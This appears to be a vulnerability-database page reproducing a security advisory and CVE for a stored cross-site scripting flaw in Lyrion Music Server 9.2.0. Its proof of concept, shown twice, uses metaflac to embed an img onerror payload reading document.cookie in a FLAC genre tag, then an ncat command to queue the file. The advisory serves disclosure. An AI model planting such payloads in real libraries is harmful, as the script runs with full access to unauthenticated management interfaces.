Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990

7.2 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Description

Summary Lyrion Music Server formerly Logitech Media Server, and often abbreviated as "LMS" is open-source software which can control and serve stream music to a wide range of physical and virtual audio players called Squeezeboxes. Lyrion Music Server...

Visit Original Source

Basic Information

ID ZSL-2026-5990

Published Jun 5, 2026 at 00:00

Affected Product

Affected Versions <html><body><p>Lyrion Music Server 9.2.0 (metadata) Stored XSS

Vendor: LMS Community
Product web page: https://www.lyrion.org
Affected version 9.2.0

Summary: Lyrion Music Server (formerly Logitech Media Server, and
often abbreviated as "LMS" ) is open-source software which can control
and serve (stream) music to a wide range of physical and virtual audio
players called Squeezeboxes. Lyrion Music Server can stream your local
music collection, internet radio stations, and content from many streaming
services (with and without subscriptions).

Desc: Lyrion Music Server stores media file metadata tags (such as GENRE,
ARTIST, and ALBUM) exactly as written in the file and later renders them
in its web interface without HTML-encoding, resulting in stored cross-site
scripting. An attacker who gets a file with a malicious tag into the victim's
library has their payload saved during the next library scan and executed
automatically whenever a user views that track's information or plays the
file in the web UI. Because LMS is unauthenticated by default, the injected
script runs with full access to the management interface, allowing admin
commands, settings disclosure, and further exploitation.

Tested on: Windows 10 (64-bit) - EN
Lyrion Music Server (9.2.0 - 1779973211)
Perl/5.32.1
SQLite

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5990
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5990
CVE ID: CVE-2026-50232
CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-50232

27.05.2026

--

$ metaflac --set-tag=GENRE="<img onerror="alert(document.cookie)" src="1"/>" evil.flac
$ metaflac --list evil.flac
METADATA block #0
type: 0 (STREAMINFO)
is last: false
length: 34
minimum blocksize: 4608 samples
maximum blocksize: 4608 samples
minimum framesize: 2305 bytes
maximum framesize: 14124 bytes
sample_rate: 44100 Hz
channels: 2
bits-per-sample: 16
total samples: 4664587
MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d
METADATA block #1
type: 4 (VORBIS_COMMENT)
is last: false
length: 98
vendor string: Lavf57.83.100
comments: 2
comment[0]: encoder=Lavf57.83.100
comment[1]: GENRE=<img onerror="alert(document.cookie)" src="1"/>
METADATA block #2
type: 1 (PADDING)
is last: true
length: 8140

$ ncat localhost 9090
playlist add file:///music/evil.flac
</p></body></html>

{
    "lastseen": "2026-06-05T18:50:34",
    "description": "Summary Lyrion Music Server formerly Logitech Media Server, and often abbreviated as \"LMS\" is open-source software which can control and serve stream music to a wide range of physical and virtual audio players called Squeezeboxes. Lyrion Music Server...",
    "published": "2026-06-05T00:00:00",
    "modified": "2026-06-05T00:00:00",
    "type": "zeroscience",
    "title": "Lyrion Music Server 9.2.0 (metadata) Stored XSS",
    "source": "",
    "references": "",
    "id": "ZSL-2026-5990",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-50232"
    ],
    "sourceData": "<html><body><p>Lyrion Music Server 9.2.0 (metadata) Stored XSS\n\n\nVendor: LMS Community\nProduct web page: https://www.lyrion.org\nAffected version 9.2.0\n\nSummary: Lyrion Music Server (formerly Logitech Media Server, and\noften abbreviated as \"LMS\" ) is open-source software which can control\nand serve (stream) music to a wide range of physical and virtual audio\nplayers called Squeezeboxes. Lyrion Music Server can stream your local\nmusic collection, internet radio stations, and content from many streaming\nservices (with and without subscriptions).\n\nDesc: Lyrion Music Server stores media file metadata tags (such as GENRE,\nARTIST, and ALBUM) exactly as written in the file and later renders them\nin its web interface without HTML-encoding, resulting in stored cross-site\nscripting. An attacker who gets a file with a malicious tag into the victim's\nlibrary has their payload saved during the next library scan and executed\nautomatically whenever a user views that track's information or plays the\nfile in the web UI. Because LMS is unauthenticated by default, the injected\nscript runs with full access to the management interface, allowing admin\ncommands, settings disclosure, and further exploitation.\n\nTested on: Windows 10 (64-bit) - EN\n           Lyrion Music Server (9.2.0 - 1779973211)\n           Perl/5.32.1\n           SQLite\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n                            @zeroscience\n\n\nAdvisory ID: ZSL-2026-5990\nAdvisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5990\nCVE ID: CVE-2026-50232\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2026-50232\n\n\n27.05.2026\n\n--\n\n\n$ metaflac --set-tag=GENRE=\"<img onerror=\"alert(document.cookie)\" src=\"1\"/>\" evil.flac\n$ metaflac --list evil.flac\nMETADATA block #0\n  type: 0 (STREAMINFO)\n  is last: false\n  length: 34\n  minimum blocksize: 4608 samples\n  maximum blocksize: 4608 samples\n  minimum framesize: 2305 bytes\n  maximum framesize: 14124 bytes\n  sample_rate: 44100 Hz\n  channels: 2\n  bits-per-sample: 16\n  total samples: 4664587\n  MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d\nMETADATA block #1\n  type: 4 (VORBIS_COMMENT)\n  is last: false\n  length: 98\n  vendor string: Lavf57.83.100\n  comments: 2\n    comment[0]: encoder=Lavf57.83.100\n    comment[1]: GENRE=<img onerror=\"alert(document.cookie)\" src=\"1\"/>\nMETADATA block #2\n  type: 1 (PADDING)\n  is last: true\n  length: 8140\n\n$ ncat localhost 9090\nplaylist add file:///music/evil.flac\n</p></body></html>",
    "sourceHref": "https://www.zeroscience.mk/codes/lyrion_xss2.txt",
    "cvss": {
        "score": 7.2,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.zeroscience.mk/advisories/ZSL-2026-5990.html",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply